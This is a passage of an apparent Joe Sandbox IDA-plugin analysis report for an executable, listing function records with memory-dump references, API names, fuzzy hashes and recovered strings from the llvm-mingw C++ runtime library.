                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: abortfflush
                                      • String ID: getReg$libunwind: %s - %s$setReg$unsupported register
                                      • API String ID: 4129902348-1024193272
                                      • Opcode ID: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
                                      • Instruction ID: 781f2fb296e5af16798e7065be9fca56be2e43d8ac82bc8e07890187366914f9
                                      • Opcode Fuzzy Hash: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
                                      • Instruction Fuzzy Hash: 52112E50E0B91B91EA14FFA5E9D62B81727DF84782F688436C50D933A7EE3CA501C301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: isxdigit$malloc
                                      • String ID:
                                      • API String ID: 1399014089-0
                                      • Opcode ID: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
                                      • Instruction ID: 3c73cc75b7f63bf808cba69d6c2425b02755dc5ce8ea8f375f734f3a31d786d0
                                      • Opcode Fuzzy Hash: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
                                      • Instruction Fuzzy Hash: 9F41BE62608B8642FB594F24D89037E67A1FB40F41F6C4535CBAD86BA6EF7CE4A1C310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: mallocrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 948496778-4167058683
                                      • Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
                                      • Instruction ID: 7bf4aabecc61c1b13fb117b854ac205085046fba6994bcab3b55a1cbb8147947
                                      • Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
                                      • Instruction Fuzzy Hash: B261F6B2A06B8682EF148F15E8946BC77A6EB14784F6C8631DB5D47792DF3CE552C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID: or<char>
                                      • API String ID: 1833655766-3520798227
                                      • Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
                                      • Instruction ID: 21eb3e16684f093fde776dace9ab83537378f61d3890477b41f9e2799d4c7aa7
                                      • Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
                                      • Instruction Fuzzy Hash: 7C5173B2A06B8683DE25CF55E550269B366EB94BC4F54C531DB8E47792EF3CE191C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assert$callocmemset
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp$reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0$reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0
                                      • API String ID: 1513271871-212362933
                                      • Opcode ID: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
                                      • Instruction ID: fc322b9411d7d9cb1c2885646a347b4e2c0c2994e77a62659c6ccb121f1fef00
                                      • Opcode Fuzzy Hash: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
                                      • Instruction Fuzzy Hash: E341B111F1A52680FB159F16EA516B92377AF84BC0F694131CD0E83BEAEE3DA946C300
                                      APIs
                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF6099DFEF8,00007FF6099DFEF8,?,?,00007FF6099B0000,?,00007FF6099B2521), ref: 00007FF6099B27F3
                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF6099DFEF8,00007FF6099DFEF8,?,?,00007FF6099B0000,?,00007FF6099B2521), ref: 00007FF6099B2857
                                      • memcpy.MSVCRT ref: 00007FF6099B2870
                                      • GetLastError.KERNEL32(?,?,?,?,00007FF6099DFEF8,00007FF6099DFEF8,?,?,00007FF6099B0000,?,00007FF6099B2521), ref: 00007FF6099B28B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                      • API String ID: 2595394609-2123141913
                                      • Opcode ID: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
                                      • Instruction ID: 139db8d6973f2bc35516744b917c89598ef37b325e5b474e2d0a91c0c5f03e44
                                      • Opcode Fuzzy Hash: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
                                      • Instruction Fuzzy Hash: 8641AE61A09A0681FA618F16D9846BD37B2FF94B90F784536CE1EC37A2DE3CE546C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_ostream$starts_with(SV, "basic_")
                                      • API String ID: 2326172077-1855325571
                                      • Opcode ID: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
                                      • Instruction ID: 235e91e22f631beeab780f7a57d804db5707db9794fc7ea16bef69bb9c3e762e
                                      • Opcode Fuzzy Hash: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
                                      • Instruction Fuzzy Hash: 771194F2F0A60282EA648F05F98036963A3EF647C1F588435CA4D47B96EF2CE551C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertabort
                                      • String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND)$actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND)$actions & _UA_SEARCH_PHASE
                                      • API String ID: 1072228434-30274522
                                      • Opcode ID: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
                                      • Instruction ID: e39808a7f32fd1f000df75f8c018e007b0b9a415aa5ab1b9e53d89fa9b78a54e
                                      • Opcode Fuzzy Hash: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
                                      • Instruction Fuzzy Hash: ABF0E923E1E40690EA249F96ECC14B41326AF15755F790531DD1DC33D6ED3CD44AC200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 2517790541-0
                                      • Opcode ID: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
                                      • Instruction ID: d95b70461940d0bcae3481084cf7ae82b5ea8e9d6948d31969257ccb878e5284
                                      • Opcode Fuzzy Hash: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
                                      • Instruction Fuzzy Hash: E59184B2A06B8283EB258F16E8543A963A5FB54B84F188531DF9D477A2EF3CE5518300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
                                      • Instruction ID: d90d9d187ee1e9871a303fb24690e4a366cd575af84542864b1a0af962edfcfc
                                      • Opcode Fuzzy Hash: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
                                      • Instruction Fuzzy Hash: 3B9163B2A0AB4283EA258F56F45436DB3A6EB687C0F558531DB9E477A1EF3CE4458300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fputwc
                                      • String ID:
                                      • API String ID: 761389786-0
                                      • Opcode ID: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
                                      • Instruction ID: a918231ab17ea3cb2405bfa41467a365fd01355f468b0531fc7b6e8e3cca0e15
                                      • Opcode Fuzzy Hash: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
                                      • Instruction Fuzzy Hash: 9EE14572A1920287E7748E56E25473E76F3EB94751F285239DB5AC6F92DE2CF440C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc
                                      • String ID: auto
                                      • API String ID: 2642181057-1723475450
                                      • Opcode ID: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
                                      • Instruction ID: 0496a72f65a0862d27b6a29f4c78f7b298d9fc14c7dc13a039477d49776511c6
                                      • Opcode Fuzzy Hash: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
                                      • Instruction Fuzzy Hash: 9FA1096260AB8181EB249F25DA443BD77A6EB04790F584236CBAD873D3EF7CE595C300
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
                                      • Instruction ID: 8d42fcff595458e712f4baab1791a8890100ef38c8d968f3d23509b6e1a1efd9
                                      • Opcode Fuzzy Hash: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
                                      • Instruction Fuzzy Hash: EE71AE63F0E18246F7798E26E5C177966D3AF19754F2C5231CA6A96BC3DE3CE8818700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$malloc
                                      • String ID: imaginary$noexcept
                                      • API String ID: 454241450-3971218317
                                      • Opcode ID: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
                                      • Instruction ID: b84d42cf3582b433a1551c57577c088fc103765f90efc5a8e5d5bbba715f38e7
                                      • Opcode Fuzzy Hash: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
                                      • Instruction Fuzzy Hash: 8351B1B2A06B8682EB288F55E4407AD73A1EB58BC4F288531DB8E47796EF3CD551C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assert$fflush
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & _UA_CLEANUP_PHASE$results.reason == _URC_HANDLER_FOUND
                                      • API String ID: 289967094-1554099779
                                      • Opcode ID: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
                                      • Instruction ID: 1c238399922d200ef7d8cb77fed1233a26826eb9a8a93c2df5e45fed7c3ab0f3
                                      • Opcode Fuzzy Hash: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
                                      • Instruction Fuzzy Hash: B341BD21F0D64241FF729F82E2A07BA63A6AB95790F2C4135DE4DC7B97DE2DE5418380
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: tInt$unsigned
                                      • API String ID: 471065373-1789806510
                                      • Opcode ID: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
                                      • Instruction ID: babcdf3048815eddcaca15ed807ed760bd8f692ef5facaf732cdcd925972c93c
                                      • Opcode Fuzzy Hash: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
                                      • Instruction Fuzzy Hash: C9414FF2A06B8682DA25DF56F45426DB3A2EB64BC0F54C531CB9E47792EF3CE5418340
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
